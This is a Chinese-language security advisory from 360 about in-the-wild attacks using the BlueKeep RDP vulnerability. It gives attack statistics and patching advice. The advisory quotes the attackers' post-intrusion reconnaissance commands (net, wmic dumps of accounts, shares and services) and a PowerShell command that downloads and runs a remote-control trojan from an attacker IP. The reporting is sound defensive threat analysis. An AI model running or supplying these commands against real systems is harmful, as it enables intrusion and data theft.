中文版 Global
首页 > 安全资讯 > 正文

RDP远程漏洞(CVE-2019-0708)被发现野外利用来窃取隐私

  • 2019-11-11 09:47:23

  2019年05月15日,Windows被曝出一个威力堪比“永恒之蓝”的高危远程漏洞Bluekeep(CVE-2019-0708),该漏洞无需用户交互,只要联网即可能被黑客利用,并可用于发起大规模“蠕虫

级”攻击,甚至超越2017年WannaCry蠕虫风暴,一时间,全球陷入高度关注与持续恐慌。半年来,漏洞预警、漏洞补丁、免疫工具、漏洞EXP代码发布……每一个相关行动,都牵动着安全界的敏感

神经。

   事件发酵至10月23日,360安全大脑全球首家监测到BlueKeep漏洞的野外利用,有攻击者疑似通过BlueKeep漏洞对国内某高校计算机发起攻击,该攻击行动旨在窃取该计算机内部的敏感信息。而到了11月1日,360安全大脑再次捕获一起利用BlueKeep漏洞发起的攻击案例,此次事件,攻击者则利用BlueKeep漏洞释放“暗影远控”木马。

BlueKeep漏洞武器化,野外利用被捕捉

    对于10月23日360率先发现的利用BlueKeep漏洞攻击高校事件,360安全大脑对攻击数据进行整理分析,发现攻击者使用漏洞对目标发起攻击,之后通过msf模块入侵计算机,并在入侵成功后运行指令以窃取受害用户的隐私数据,包括局域网信息、路由信息、用户账户信息、进程信息、磁盘信息、服务信息、网络设备信息、日志存储路径、共享目录、用户组信息、启动项、补丁信息、远程桌面信息、产品信息等诸多机器敏感信息,并回传给攻击者。 

攻击者运行指令如下:

ARP -a

ROUTE print

netstat -ano

net accounts

net user

tasklist

wmic /append:C:\Windows\TEMP\31505.csv logicaldisk get description,filesystem,name,size /format:csv

wmic /append:C:\Windows\TEMP\60660.csv netuse get name,username,connectiontype,localname /format:csv

wmic /append:C:\Windows\TEMP\75989.csv service list brief /format:csv

wmic /append:C:\Windows\TEMP\66223.csv netclient list brief /format:csv

wmic /append:C:\Windows\TEMP\72970.csv useraccount list /format:csv

wmic /append:C:\Windows\TEMP\44857.csv nteventlog get path,filename,writeable /format:csv

wmic /append:C:\Windows\TEMP\44821.csv share get name,path /format:csv

wmic /append:C:\Windows\TEMP\84390.csv group list /format:csv

wmic /append:C:\Windows\TEMP\58608.csv startup list full /format:csv

wmic /append:C:\Windows\TEMP\12131.csv qfe /format:csv

wmic /append:C:\Windows\TEMP\72026.csv rdtoggle list /format:csv

wmic /append:C:\Windows\TEMP\42816.csv product get name,version /format:csv

   而对于另外一起利用BlueKeep传播远控木马事件,经过360安全大脑的分析,在该攻击案例中,黑客一旦利用漏洞攻入用户计算机,便会通过如下命令调用系统powershell功能自动下载木马到本地运行:

cmd /S /D /c" ( echo powershell "($client = new-object System.Net.WebClient) -and ($client.DownloadFile('hxxp://106.13.85.247/m/1.exe', 'test.exe')) -and (exit)" )"

   虽然在此次攻击中,黑客不再使用大量命令行操作,但由于是释放了木马到受害用户本地运行,所以反而可以获得更多的隐私数据。

   黑客所下载的木马实际上是一款远控木马。根据其内置的字符串信息看出,该木马为“暗影远控2019(超稳定版)”

   木马讲其上线地址与端口硬编码在程序内部,直接使用(与其下载地址相同)

   该远控所使用的协议与经典的Gh0st远控相似,均使用zlib对其上线数据进行压缩。

   对其上线数据包进行解压后,可看到明文的上线信息(信息以双斜线“//”为分割,为便于展示人工添加了换行)。显然,上线数据中,已包含了分析人员的本机IP、计算机名、系统、CPU信息、内存信息、用户名、木马本身版本、以及运行时间(精确到秒):

而一旦远程服务器返回相关指令,木马可以在本地进行几乎任何管理员操作,下图为木马的部分功能:

BlueKeep漏洞利用攻击态势:

   结合360安全大脑防护数据看,自10月23日起,360安全大脑率先捕捉到BlueKeep的野外攻击,直至现在通过BlueKeep发起的攻击不断出现。下图为10月下旬360安全卫士客户端所拦截到的BlueKeep攻击走势图,总的攻击量虽然没有爆发趋势,但也并未出现明显的放缓迹象。

   而从受攻击用户的地域分布看,受攻击用户则主要集中在网络相对发达的地区。广东、上海、江苏、北京、浙江分列前五位。

   而从受攻击的系统来看,Windows 8.1/Windows Server 2012 R2的占比最高,占到了近一半(47.54%),而Windows 7/Windows Server 2008 R2则是占到了32.70%位列第二。此数据也与目前Windows服务器系统的分布情况大体相符,可见攻击者并未针对特定系统发起攻击,而是对所有暴露在互联网上的服务器进行撒网式攻击。

BlueKeep时间线:

    面对此次RDP风波的再度升级,广大用户不用过分担心,因为早在5月22日,针对如此高危的漏洞,360安全大脑已全球独家推出RDP远程漏洞热补丁工具http://down.360safe.com/HotFix_CVE-2019-0708.exe无需重启服务器,即可自动免疫此高危漏洞攻击,保护服务器数据及个人用户信息安全。

安全建议:

  1. 与普通的木马攻击不同,使用补丁修复漏洞,对漏洞攻击的防护效果是最好的。强烈建议广大网络管理员尽快安装360安全卫士或下载使用360高危漏洞免疫工具http://www.360.cn/webzhuanti/mianyigongju.html修复该漏洞;如果企事业单位无法安装微软补丁修复,或者服务器无法重启,请使用360安全卫士热补丁工具http://down.360safe.com/HotFix_CVE-2019-0708.exe保护数据安全。

  2. 提高安全意识,不随意点击来源不明的邮件、文档、链接等,并及时为操作系统、IE、Flash等常用软件打好补丁。

  3. 避免将远程桌面服务(RDP,默认端口为3389)暴露在公网上(如为了远程运维方便确有必要开启,则可通过VPN登录后才能访问),并关闭445、139、135等不必要的端口。

360安全卫士

热点排行

用户
反馈 返回
顶部